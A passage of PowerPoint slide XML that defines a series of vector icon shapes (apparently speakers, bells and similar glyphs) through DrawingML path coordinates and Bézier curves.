                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="5397" y="14648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0"/>
                  <a:pt x="3344" y="7315"/>
                  <a:pt x="5397" y="6952"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5397" y="6952"/>
                  <a:pt x="5397" y="14648"/>
                  <a:pt x="5397" y="14648"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="21589" y="1527"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="21591" y="1508"/>
                  <a:pt x="21600" y="1490"/>
                  <a:pt x="21600" y="1472"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21600" y="658"/>
                  <a:pt x="20386" y="0"/>
                  <a:pt x="18889" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18123" y="0"/>
                  <a:pt x="17435" y="174"/>
                  <a:pt x="16942" y="451"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5939" y="5905"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2628" y="6050"/>
                  <a:pt x="0" y="8183"/>
                  <a:pt x="0" y="10800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="13425"/>
                  <a:pt x="2646" y="15563"/>
                  <a:pt x="5972" y="15696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2"/>
                  <a:pt x="21589" y="20073"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21589" y="20073"/>
                  <a:pt x="21589" y="1527"/>
                  <a:pt x="21589" y="15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6" name="Shape 2676"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5718298" y="286964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1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59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7"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="13822" y="1042"/>
                  <a:pt x="13988" y="987"/>
                  <a:pt x="14171" y="987"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14546" y="987"/>
                  <a:pt x="14850" y="1208"/>
                  <a:pt x="14850" y="1479"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14850" y="1479"/>
                  <a:pt x="14850" y="20121"/>
                  <a:pt x="14850" y="20121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7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5699" y="6406"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12150" y="2147"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="12150" y="2147"/>
                  <a:pt x="12150" y="19448"/>
                  <a:pt x="12150" y="19448"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4050" y="14648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0"/>
                  <a:pt x="2509" y="7315"/>
                  <a:pt x="4050" y="6952"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4050" y="6952"/>
                  <a:pt x="4050" y="14648"/>
                  <a:pt x="4050" y="14648"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="16208" y="1472"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="16208" y="658"/>
                  <a:pt x="15297" y="0"/>
                  <a:pt x="14174" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13599" y="0"/>
                  <a:pt x="13083" y="174"/>
                  <a:pt x="12713" y="451"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4456" y="5905"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1972" y="6050"/>
                  <a:pt x="0" y="8183"/>
                  <a:pt x="0" y="10800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="13425"/>
                  <a:pt x="1985" y="15563"/>
                  <a:pt x="4481" y="15696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2"/>
                  <a:pt x="16200" y="20073"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="16200" y="1527"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="16201" y="1508"/>
                  <a:pt x="16208" y="1490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4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3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6"/>
                  <a:pt x="21600" y="10800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21600" y="9173"/>
                  <a:pt x="20089" y="7855"/>
                  <a:pt x="1822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7" name="Shape 2677"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6289746" y="1269857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0" y="5554"/>
                  <a:pt x="17660" y="5774"/>
                  <a:pt x="17660" y="6044"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="17660" y="6216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5"/>
                  <a:pt x="17915" y="15147"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="17919" y="15152"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="17771" y="15239"/>
                  <a:pt x="17668" y="15384"/>
                  <a:pt x="17668" y="15556"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="17668" y="15827"/>
                  <a:pt x="17910" y="16046"/>
                  <a:pt x="18208" y="16046"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18306" y="16046"/>
                  <a:pt x="18393" y="16016"/>
                  <a:pt x="18473" y="15975"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="18480" y="15985"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="20338" y="14990"/>
                  <a:pt x="21600" y="13041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1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7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80"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11880" y="1480"/>
                  <a:pt x="11880" y="20121"/>
                  <a:pt x="11880" y="20121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7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4560" y="6406"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9720" y="2147"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="9720" y="2147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0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79" y="0"/>
                  <a:pt x="10466" y="175"/>
                  <a:pt x="10170" y="451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5" y="15697"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="10170" y="21148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0"/>
                  <a:pt x="12966" y="147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8" name="Shape 2678"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6810311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1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7"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="10052" y="1042"/>
                  <a:pt x="10173" y="987"/>
                  <a:pt x="10306" y="987"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10579" y="987"/>
                  <a:pt x="10800" y="1208"/>
                  <a:pt x="10800" y="1479"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10800" y="1479"/>
                  <a:pt x="10800" y="20121"/>
                  <a:pt x="10800" y="20121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7" y="6407"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4145" y="6406"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8836" y="2147"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="8836" y="2147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0"/>
                  <a:pt x="1825" y="7315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8"/>
                  <a:pt x="11126" y="0"/>
                  <a:pt x="10308" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9890" y="0"/>
                  <a:pt x="9515" y="174"/>
                  <a:pt x="9246" y="451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5"/>
                  <a:pt x="1444" y="15563"/>
                  <a:pt x="3259" y="15696"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="9245" y="21148"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="9514" y="21426"/>
                  <a:pt x="9890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2"/>
                  <a:pt x="11782" y="20073"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="11782" y="1527"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="11782" y="1508"/>
                  <a:pt x="11787" y="1490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4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3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3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1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6" y="5711"/>
                  <a:pt x="20618" y="8095"/>
                  <a:pt x="20618" y="10800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20618" y="13505"/>
                  <a:pt x="19336" y="15889"/>
                  <a:pt x="17385" y="17302"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="17389" y="17309"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="17275" y="17398"/>
                  <a:pt x="17197" y="17531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8" y="18179"/>
                  <a:pt x="17875" y="18142"/>
                  <a:pt x="17952" y="18091"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="17957" y="18098"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="17982" y="18080"/>
                  <a:pt x="18004" y="18057"/>
                  <a:pt x="18029" y="18039"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18031" y="18037"/>
                  <a:pt x="18034" y="18035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5"/>
                  <a:pt x="17948" y="3495"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="15811" y="5611"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="15802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1" y="5553"/>
                  <a:pt x="15072" y="5773"/>
                  <a:pt x="15072" y="6044"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15072" y="6216"/>
                  <a:pt x="15166" y="6361"/>
                  <a:pt x="15300" y="6448"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="15299" y="6450"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="16709" y="7270"/>
                  <a:pt x="17673" y="8909"/>
                  <a:pt x="17673" y="10800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="17673" y="12688"/>
                  <a:pt x="16712" y="14325"/>
                  <a:pt x="15305" y="15146"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="15309" y="15151"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="15174" y="15239"/>
                  <a:pt x="15080" y="15384"/>
                  <a:pt x="15080" y="15555"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15080" y="15827"/>
                  <a:pt x="15300" y="16046"/>
                  <a:pt x="15571" y="16046"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15660" y="16046"/>
                  <a:pt x="15740" y="16016"/>
                  <a:pt x="15812" y="15975"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="15819" y="15985"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="17507" y="14989"/>
                  <a:pt x="18655" y="13041"/>
                  <a:pt x="18655" y="10800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18655" y="8556"/>
                  <a:pt x="17504" y="6606"/>
                  <a:pt x="15811" y="561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79" name="Shape 2679"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7343572" y="1282553"/>
            <a:ext cx="279328" cy="253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60" y="20448"/>
                  <a:pt x="982" y="18280"/>
                  <a:pt x="982" y="15605"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="982" y="12930"/>
                  <a:pt x="2960" y="10762"/>
                  <a:pt x="5400" y="10762"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="16200" y="10762"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="18640" y="10762"/>
                  <a:pt x="20618" y="12930"/>
                  <a:pt x="20618" y="15605"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20618" y="18280"/>
                  <a:pt x="18640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8" y="6820"/>
                  <a:pt x="13255" y="6038"/>
                  <a:pt x="13255" y="4843"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13255" y="1854"/>
                  <a:pt x="10169" y="128"/>
                  <a:pt x="10038" y="56"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9796" y="-76"/>
                  <a:pt x="9501" y="32"/>
                  <a:pt x="9379" y="297"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9258" y="562"/>
                  <a:pt x="9356" y="886"/>
                  <a:pt x="9598" y="1019"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9625" y="1034"/>
                  <a:pt x="12273" y="2523"/>
                  <a:pt x="12273" y="4843"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12273" y="5586"/>
                  <a:pt x="11779" y="6117"/>
                  <a:pt x="11255" y="6679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5" y="19372"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="12035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3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3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0" name="Shape 2680"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7876833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29"/>
                  <a:pt x="9818" y="16200"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9818" y="16472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2"/>
                  <a:pt x="13745" y="16200"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13745" y="15929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2"/>
                  <a:pt x="9736" y="11976"/>
                  <a:pt x="9617" y="11887"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="9622" y="11880"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5695" y="8935"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5690" y="8941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88"/>
                  <a:pt x="4991" y="9624"/>
                  <a:pt x="5110" y="9713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2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4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3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1" name="Shape 2681"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8410094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6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6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0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6"/>
                  <a:pt x="17944" y="3436"/>
                  <a:pt x="17673" y="3436"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="17402" y="3436"/>
                  <a:pt x="17182" y="3656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6"/>
                  <a:pt x="4198" y="3436"/>
                  <a:pt x="3927" y="3436"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3656" y="3436"/>
                  <a:pt x="3436" y="3656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3" y="9947"/>
                  <a:pt x="2001" y="10128"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1998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0"/>
                  <a:pt x="0" y="18484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4"/>
                  <a:pt x="21575" y="18320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6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6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6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6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5"/>
                  <a:pt x="8842" y="2952"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="9546" y="3655"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="9805" y="3231"/>
                  <a:pt x="10267" y="2945"/>
                  <a:pt x="10800" y="2945"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11298" y="2945"/>
                  <a:pt x="11736" y="3194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7"/>
                  <a:pt x="11071" y="3927"/>
                  <a:pt x="10800" y="3927"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10529" y="3927"/>
                  <a:pt x="10309" y="4147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8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5"/>
                  <a:pt x="9726" y="982"/>
                  <a:pt x="10800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2" name="Shape 2682"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8943355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2"/>
                  <a:pt x="12764" y="16200"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12764" y="15929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29"/>
                  <a:pt x="6873" y="16200"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6873" y="16472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3" name="Shape 2683"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9514706" y="1269857"/>
            <a:ext cx="203145" cy="279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4" name="Shape 2684"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10009878" y="1269856"/>
            <a:ext cx="279328" cy="279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5"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5400" y="19095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5"/>
                  <a:pt x="4418" y="19095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9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6382" y="17139"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6382" y="17139"/>
                  <a:pt x="6382" y="16160"/>
                  <a:pt x="6382" y="16160"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="2455" y="19095"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3436" y="19095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5"/>
                  <a:pt x="2455" y="19095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9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4418" y="17139"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4418" y="17139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5"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="13255" y="19095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5"/>
                  <a:pt x="6382" y="19095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9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14236" y="17139"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="14236" y="17139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4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4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3"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10965" y="9803"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="10831" y="9456"/>
                  <a:pt x="10774" y="9056"/>
                  <a:pt x="10870" y="8651"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11059" y="7853"/>
                  <a:pt x="11782" y="7224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5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2"/>
                  <a:pt x="15378" y="388"/>
                  <a:pt x="15464" y="644"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="16091" y="2519"/>
                  <a:pt x="15480" y="4964"/>
                  <a:pt x="12650" y="5904"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10733" y="6542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3"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1964" y="9803"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="879" y="9803"/>
                  <a:pt x="0" y="10679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9"/>
                  <a:pt x="20721" y="9803"/>
                  <a:pt x="19636" y="9803"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="17182" y="17139"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="19145" y="17139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9"/>
                  <a:pt x="17182" y="17139"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="14236" y="19095"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="15218" y="19095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5"/>
                  <a:pt x="14236" y="19095"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="16200" y="19095"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="17182" y="19095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5"/>
                  <a:pt x="16200" y="19095"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="18164" y="19095"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="19145" y="19095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5"/>
                  <a:pt x="18164" y="19095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9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16200" y="17139"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="16200" y="17139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9"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8345" y="17139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9"/>
                  <a:pt x="7364" y="17139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9"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="12273" y="17139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9"/>
                  <a:pt x="11291" y="17139"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="9327" y="17139"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10309" y="17139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9"/>
                  <a:pt x="9327" y="1713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5" name="Shape 2685"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10543139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4"/>
                  <a:pt x="18332" y="12764"/>
                  <a:pt x="19145" y="12764"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="19959" y="12764"/>
                  <a:pt x="20618" y="13424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4"/>
                  <a:pt x="1641" y="12764"/>
                  <a:pt x="2455" y="12764"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3268" y="12764"/>
                  <a:pt x="3927" y="13424"/>
                  <a:pt x="3927" y="14236"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="19636" y="11831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1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1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1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6" name="Shape 2686"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11076400" y="126985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5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4"/>
                  <a:pt x="16368" y="12764"/>
                  <a:pt x="17182" y="12764"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="17995" y="12764"/>
                  <a:pt x="18655" y="13424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4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4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5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3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3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7" name="Shape 2687"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6277049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7"/>
                  <a:pt x="15799" y="19636"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="18564" y="19636"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="18361" y="20207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1" y="13175"/>
                  <a:pt x="18564" y="13745"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="15799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1" y="13745"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3036" y="13745"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3239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9" y="20207"/>
                  <a:pt x="3036" y="19636"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5801" y="19636"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5598" y="20207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1"/>
                  <a:pt x="2945" y="12282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2"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="18244" y="11971"/>
                  <a:pt x="17736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8" name="Shape 2688"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6810311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8" y="11291"/>
                  <a:pt x="19636" y="11291"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="19636" y="7364"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="20178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59"/>
                  <a:pt x="18977" y="0"/>
                  <a:pt x="18164" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="17350" y="0"/>
                  <a:pt x="16691" y="659"/>
                  <a:pt x="16691" y="1473"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="16691" y="1844"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2459" y="6029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79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1"/>
                  <a:pt x="9818" y="21109"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9818" y="21072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1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16691" y="17182"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="16691" y="17995"/>
                  <a:pt x="17350" y="18655"/>
                  <a:pt x="18164" y="18655"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18977" y="18655"/>
                  <a:pt x="19636" y="17995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89" name="Shape 2689"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7343572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0" name="Shape 2690"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7876833" y="1815814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8" y="12960"/>
                  <a:pt x="19636" y="12960"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="19636" y="8640"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="20178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9"/>
                  <a:pt x="18434" y="20520"/>
                  <a:pt x="18164" y="20520"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="17893" y="20520"/>
                  <a:pt x="17673" y="20279"/>
                  <a:pt x="17673" y="19980"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="17673" y="1620"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="17673" y="1322"/>
                  <a:pt x="17893" y="1080"/>
                  <a:pt x="18164" y="1080"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18434" y="1080"/>
                  <a:pt x="18655" y="1322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8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6"/>
                  <a:pt x="2944" y="8093"/>
                  <a:pt x="2944" y="8089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5"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="12316" y="19294"/>
                  <a:pt x="11764" y="19608"/>
                  <a:pt x="11247" y="19428"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="6102" y="17625"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5585" y="17444"/>
                  <a:pt x="5299" y="16837"/>
                  <a:pt x="5464" y="16269"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5654" y="15610"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12661" y="18104"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="12661" y="18104"/>
                  <a:pt x="12480" y="18725"/>
                  <a:pt x="12480" y="18725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5"/>
                  <a:pt x="18977" y="0"/>
                  <a:pt x="18164" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="17350" y="0"/>
                  <a:pt x="16691" y="725"/>
                  <a:pt x="16691" y="1620"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="16691" y="2062"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2411" y="7144"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2276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6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6"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="11983" y="20819"/>
                  <a:pt x="13087" y="20190"/>
                  <a:pt x="13416" y="19053"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="13595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1" name="Shape 2691"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8473578" y="1803118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4"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="12600" y="9124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3"/>
                  <a:pt x="21335" y="15853"/>
                  <a:pt x="21335" y="15852"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="12600" y="11088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9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21349" y="5738"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="21503" y="5649"/>
                  <a:pt x="21600" y="5532"/>
                  <a:pt x="21600" y="5400"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21600" y="5265"/>
                  <a:pt x="21499" y="5142"/>
                  <a:pt x="21336" y="5053"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="12336" y="144"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="12173" y="55"/>
                  <a:pt x="11948" y="0"/>
                  <a:pt x="11700" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11203" y="0"/>
                  <a:pt x="10800" y="220"/>
                  <a:pt x="10800" y="491"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="10800" y="10106"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1552" y="5062"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1549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29"/>
                  <a:pt x="0" y="5400"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="5532"/>
                  <a:pt x="97" y="5649"/>
                  <a:pt x="251" y="5738"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="248" y="5739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2"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="265" y="15853"/>
                  <a:pt x="264" y="15853"/>
                  <a:pt x="263" y="15854"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="248" y="15862"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="251" y="15863"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="97" y="15951"/>
                  <a:pt x="0" y="16069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49" y="16537"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1552" y="16539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8" y="21600"/>
                  <a:pt x="12173" y="21546"/>
                  <a:pt x="12336" y="21456"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="21336" y="16547"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="21499" y="16458"/>
                  <a:pt x="21600" y="16336"/>
                  <a:pt x="21600" y="16200"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21600" y="16069"/>
                  <a:pt x="21503" y="15951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2" name="Shape 2692"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8968749" y="180311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3" name="Shape 2693"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9476617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6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6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6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0"/>
                  <a:pt x="14082" y="15709"/>
                  <a:pt x="15709" y="15709"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="17167" y="15709"/>
                  <a:pt x="18370" y="14646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6"/>
                  <a:pt x="4433" y="15709"/>
                  <a:pt x="5891" y="15709"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7517" y="15709"/>
                  <a:pt x="8836" y="14390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6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59"/>
                  <a:pt x="19959" y="0"/>
                  <a:pt x="19145" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18332" y="0"/>
                  <a:pt x="17673" y="659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6"/>
                  <a:pt x="11071" y="8836"/>
                  <a:pt x="10800" y="8836"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10529" y="8836"/>
                  <a:pt x="10309" y="9056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6"/>
                  <a:pt x="9108" y="8836"/>
